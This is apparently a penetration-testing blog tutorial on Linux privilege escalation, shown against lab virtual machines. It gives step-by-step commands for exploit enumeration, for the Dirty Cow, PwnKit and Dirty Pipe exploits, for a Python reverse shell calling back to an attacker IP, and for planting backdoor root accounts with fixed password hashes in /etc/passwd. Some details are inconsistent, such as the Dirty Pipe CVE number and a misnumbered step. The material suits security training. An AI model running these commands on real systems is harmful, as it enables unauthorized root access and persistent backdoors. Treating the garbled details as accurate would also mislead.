Linux Privilege Escalation: Linux kernel / distribution exploits you should know about.
Summary
This article will show you how to scan your system for potential kernel / distribution vulnerabilities.
After that, I’ll show you a few well-known linux kernel privilege escalation exploits that you should know about.
Disclaimer
This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
Over the years, many kernel exploits have become available. However, there are a few that work on a wide variety of distributions. In this article, we’ll take a closer look at just three exploits that overlap with most Linux distributions. These include Dirty Cow (kernel versions 2.2 to 3.9), Polkit (all Linux distributions since 2009 including pkexec), and Dirty Pipe (kernel versions 5.8 to 5.10).
You can use kernel exploits in order to perform a privilege escalation. However, do this only as a last resort. Kernel exploits may behave unpredictably and can destabilize the target system.
The ability to use a particular Linux kernel or distribution exploit, depends on the following factors:
- existing kernel version
- components present in the distribution
Another important aspect is compilation. If possible, always compile your exploits on the target system. If no compiler is available, the exploit can be compiled on the attacker’s machine and copied to the target system.
The POC consists of multiple Linux machines (our victims) and one attacker machine (Kali Linux 2022.3 release).
Victim 01 (Dirty Cow)
- Metasploitable (x86)
- IP-Address: 192.168.62.162
- Kernel version: 2.6.24–16
Victim 02 (Polkit)
- Ubuntu 16.04 (x64)
- IP-Address: 192.168.62.177
- Kernel version: 4.4.0–21-generic
Victim 03 (Dirty Pipe)
- Kali Linux (x86)
- IP-Address: 192.168.62.171
- Kernel version: 5.10–40
Attacker (for reverse shell)
- Kali Linux
- IP-Address: 192.168.62.161
Initial foothold:
Our initial foothold consists of a standard (reverse) shell. The exploited user does not have sudo rights.
The next sections include:
- Steps 1–5: linux-exploit-suggester.sh
- Steps 6–7: manual enumeration
- Steps 8–20 Dirty Cow (CVE 2016–5195)
- Steps 21–28: Polkit (CVE-2021–4034)
- Steps 29–34: Dirty Pipe (CVE 2022–0867)
- Credits
Enumeration methods
Kernel vulnerabilities enumeration can be done manually or automatically. One of the best scripts is the ‘linux-exploit-suggester.sh (at 09–16–2022 latest version: 01 April 2022). I recommend doing both manual and automatic enumeration.
linux-exploit-suggester.sh
Unfortunately, this script will not work on systems with kernel versions prior to 4.0. First, we need to modify the script so that it works on older systems as well.
1. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Open a new terminal tab and start a temporary HTTP web server. We will use this server throughout the entire exploitation process.
python3 -m http.server 80 --directory /tmp
2. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Download linux-exploit-suggester.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /tmp/linux-exploit-suggester.sh --no-verbose
3. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Adjust the exploit to make it compatible with older systems
nano /tmp/linux-exploit-suggester.shCTRL + W > search for ‘version 4.0’
Original code :
if ((BASH_VERSINFO[0] < 4)); then
Adjusted code:
if ((BASH_VERSINFO[0] < 1)); then
Save the adjusted script.
CTRL+O, CTRL+X
4. Performed on 192.168.62.162 (victim machine, Metasploitable).
Use wget to download the script linux-exploit-suggester.sh from the Kali machine.
LHOST=192.168.62.161
LPORT=80
file=linux-exploit-suggester.sh
wget http://${LHOST}:${LPORT}/${file} -O /tmp/${file}; chmod 755 /tmp/${file}
Optional:
You can also use curl or python to perform the download if wget is not available on the target system.
Use curl to download the script linux-exploit-suggester.sh from the Kali machine.
LHOST=192.168.62.161
LPORT=80
file=linux-exploit-suggester.sh
curl -s http://${LHOST}:${LPORT}/${file} -o /tmp/${file}; chmod 755 /tmp/${file}; ls -l /tmp/${file};
Use python2 to download the script linux-exploit-suggester.sh from the Kali machine.
LHOST=192.168.62.161
LPORT=80
file=linux-exploit-suggester.sh
python -c "import urllib2; u = urllib2.urlopen('http://${LHOST}:${LPORT}/${file}'); localFile = open('/tmp/${file}', 'w'); localFile.write(u.read()); localFile.close()"; chmod 755 /tmp/${file}; ls -l /tmp/${file};
Our target system only supports python3, you can use the python3 requests module to download the exploit with python3.
LHOST=192.168.62.161
LPORT=80
file=linux-exploit-suggester.sh
python3 -c "import requests; url = 'http://${LHOST}:${LPORT}/${file}'; myfile = requests.get(url); open('/tmp/${file}', 'wb').write(myfile.content)"; chmod 755 /tmp/${file}5. Performed on 192.168.62.162 (victim machine, Metasploitable).
Execute linux-exploit-suggester.sh
cd /tmp
./linux-exploit-suggester.sh
On Metasploitable, we have 79 possible kernel exploits. Two of the are “probable” working on the target.
Manual enumeration
Don’t rely solely on auto-enumeration scripts. As mentioned before, you are subject to the quality of your script, so I recommend doing a manual check as well.
6. Performed on 192.168.62.177 (victim machine, Ubuntu 16.04).
Check the current architecture, release and kernel version.
arch;
cat /etc/issue;
uname -r;
7. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Use the tool searchsploit to look for possible kernel exploits.
# update to the latest version
sudo apt update && sudo apt install exploitdb# search for kernel exploits on the target system
searchsploit linux kernel ubuntu 16.04
Dirtycow (CVE 2016–5195)
Dirty COW (Dirty copy-on-write) is Linux Kernel vulnerability affecting systems with kernel versions 2.2 until 3.9. It vulnerability was discovered in 2016 by Phil Oester.
Background information: https://dirtycow.ninja.
Vulnerable kernel versions: 2.2–3.9
We will use the metasploitable (kernel 2.4) machine to use this exploit. My advice is to set up two separate reverse shells on the target machine to run this exploit. This way the connection to the target machine is maintained while the exploit is being executed or the exploit fails. We are also going to add a backdoor account, so that root access can be maintained even after the exploit is executed.
Victim 01 (Ditry Cow)
- Metasploitable (x86)
- IP-Address: 192.168.62.162
- Kernel version: 2.6.24–16
8. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Download the dirty exploit
file=dirty
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/${file}.c -O /tmp/${file}.c
9. Optional: Performed on 192.168.62.161 (attacker machine, Kali Linux).
Compile the dirty exploit (on Kali). Only perform this step if the exploit cannot be compiled locally.
file=dirty
gcc -pthread -o /tmp/${file}_x64 /tmp/${file}.c -lcrypt
Unfortunately, it was not possible to compile this exploit for x86 systems on Kali. However you can compile it on a 32bits architecture of Ubuntu.
10. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Start a netcat listener for the second reverse shell.
rlwrap nc -nlvp 443
11. Performed on 192.168.62.162 (victim machine, Metasploitable).
Set up a second reverse shell with our target machine. We will use a python2 reverse shell.
vulnscript=/tmp/rev-shell.sh
LHOST=192.168.62.161
LPORT=443
echo """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"${LHOST}\",${LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'""" >$vulnscript
chmod 755 /tmp/rev-shell.sh
cd /tmp
./rev-shell.sh &
On our Kali machine:
12. Performed on 192.168.62.162 (victim machine, Metasploitable second reverse shell).
Upgrade the second shell to an interactive Bash shell.
python -c "import pty; pty.spawn('/bin/bash')"
13. Performed on 192.168.62.162 (victim machine, Metasploitable first reverse shell).
Download the exploit source code from Kali
file=dirty
LHOST=192.168.62.161
LPORT=80
files="${file}.c ${file}_x64"
for file in $(echo $files); do wget http://${LHOST}:${LPORT}/${file} -O /tmp/${file}; chmod 755 /tmp/${file}; done
14. Performed on 192.168.62.162 (victim machine, Metasploitable first reverse shell).
Compile the exploit
cd /tmp
gcc -pthread dirty.c -o dirty -lcrypt
chmod 755 dirty
15. Performed on 192.168.62.162 (victim machine, Metasploitable first reverse shell).
copy the original /etc/passwd to /tmp
cp /etc/passwd /tmp
16. Performed on 192.168.62.162 (victim machine, Metasploitable first reverse shell).
If not done so already, upgrade current shell to an interactive shell.
python -c 'import pty; pty.spawn("/bin/sh")'Execute the exploit (takes in total about 1–3 minutes)
cd /tmp
./dirty
Press ENTER at password question (blank password)
Wait about 2/3 minutes for the exploit to complete.
The exploit executed successfully. We can switch to root user 'firefart'.
17. Performed on 192.168.62.162 (victim machine, Metasploitable first reverse shell).
Switch to user firefart (no password)
su firefart
id
We continue some post-exploitation steps to add 2 extra root users.
18. Performed on 192.168.62.162 (victim machine, Metasploitable first reverse shell).
Add a new root user hacker1 (DES password ‘hacker’) and hacker2 (MD5-crypt password ‘hacker’) to the original /etc/passwd (/tmp/passwd)
echo hacker1:UHRTHrsaEfHQ2:0:0:Hacker:/root:/bin/bash>>/tmp/passwdecho hacker2:\$1\$hacker\$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash>>/tmp/passwdchmod 644 /tmp/passwd
19. Performed on 192.168.62.162 (victim machine, Metasploitable first reverse shell).
Restore /etc/passwd and exit user firefart.
cp /tmp/passwd /etc/passwd
exit20. Performed on 192.168.62.162 (victim machine, Metasploitable second reverse shell).
Switch now to backdoor users ‘hacker1’ or ‘hacker2’ (password ‘hacker’)
su hacker1
We have a root backdoor without using the exploit again!
Local Privilege Escalation in polkit’s pkexec (CVE-2021–4034)
CVE-2021–4034 is not a kernel vulnerability, but a vulnernability in the SUID root program pkexec (part of polkit).
Qualys researchers have discovered a memory corruption vulnerability in pkexec of polkit, a SUID root program installed by default on all major Linux distributions. This easily exploitable vulnerability allows an unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in a default configuration.
Background information: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Kernels: affects all versions of pkexec since its first version in May 2009
Victim 02 (Polkit)
- Ubuntu 16.04 (x64)
- IP-Address: 192.168.62.177
- Kernel version: 4.4.0–21-generic21. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Download the polkit exploit
cd /tmp
git clone https://github.com/berdav/CVE-2021-4034.git
22. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Create tar ball from source code
cd /tmp
tar -zcvf CVE-2021–4034-source.gz CVE-2021–4034
23. Optional Performed on 192.168.62.161 (attacker machine, Kali Linux).
Compile the polkit exploit (on Kali). Only perform this step if the exploit cannot be compiled locally.
cd /tmp/CVE-2021–4034
make
24. Optional Performed on 192.168.62.161 (attacker machine, Kali Linux).
Create tar ball from x64 compilation of the exploit.
cd /tmp
tar -zcvf CVE-2021–4034.gz CVE-2021–4034
25. Performed on 192.168.62.177 (victim machine, Ubuntu 16.04).
Download both tar balls from Kali.
file='CVE-2021-4034.gz CVE-2021-4034-source.gz'
LHOST=192.168.62.161
LPORT=80
files="${file}"
for file in $(echo $files); do wget --no-verbose http://${LHOST}:${LPORT}/${file} -O /tmp/${file}; chmod 755 /tmp/${file}; done
26. Performed on 192.168.62.177 (victim machine, Ubuntu 16.04).
Extract source files.
cd /tmp
tar -xzvf CVE-2021–4034-source.gz
27. Performed on 192.168.62.177 (victim machine, Ubuntu 16.04).
Complile the exploit.
cd /tmp/CVE-2021–4034
make
28. Performed on 192.168.62.177 (victim machine, Ubuntu 16.04).
Execute the exploit.
cd /tmp/CVE-2021–4034
./cve-2021–4034
We have our root access!
Dirty-Pipe (CVE-2022–0867)
CVE-2022–0847 is a vulnerability in Linux kernels between 5.8 and 5.10 that can overwrite data in arbitrary read-only files. This leads to privilege escalation as an unprivileged process can inject code into a root process.
Background information: https://sysdig.com/blog/cve-2022-0847-dirty-pipe-sysdig/
Kernels: 5.8 until 5.10–108
Victim 03 (Dirty Pipe)
- Kali Linux (x86)
- IP-Address: 192.168.62.171
- Kernel version: 5.10–40
29. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Download the dirty pipe exploit
file=exploit-1
wget https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/${file}.c -O /tmp/${file}.c
30. Optional: Performed on 192.168.62.161 (attacker machine, Kali Linux).
Compile the exploit on Kali (x86 and x64 version). Only perform this step if the exploit cannot be compiled locally on the target.
file=exploit-1
gcc -m32 -static -o /tmp/${file}_x86 /tmp/${file}.c
gcc -static -o /tmp/${file}_x64 /tmp/${file}.c
31. Performed on 192.168.62.171 (victim machine, Kali Linux 2022.1 x86).
Download the exploit source code and compiled versions from the Kali attacker machine.
file=exploit-1
LHOST=192.168.62.161
LPORT=80
files="${file}.c ${file}_x86 ${file}_x64"
for file in $(echo $files); do wget --no-verbose http://${LHOST}:${LPORT}/${file} -O /tmp/${file}; chmod 755 /tmp/${file}; done
23. Performed on 192.168.62.171 (victim machine, Kali Linux 2022.1 x86).
Compile the exploit.
file=exploit-1
gcc -o /tmp/${file} /tmp/${file}.c
33. Performed on 192.168.62.171 (victim machine, Kali Linux 2022.1 x86).
Execute the exploit.
file=exploit-1
/tmp/${file}
Note: ignore error “System() function call …”.
34. Performed on 192.168.62.171 (victim machine, Kali Linux 2022.1 x86).
Switch to root with password ‘piped’
su root
We are root!
Mitigation
Mitigation for all of these vulnerabilities is to have your distro up to date with the latest security patches.
Credits
Credits to Phil Oester for the discovery of the ‘Dirty Cow’ vulnerability.
Credits to Qualis for the discovery of the ‘Polkit’ vulnerability.
Credits to CM4Allfor the discovery of the ‘Dirty Pipe’ vulnerability.
Credits to MZet for maintaining linux-exploit-suggester.sh (https://github.com/mzet-)
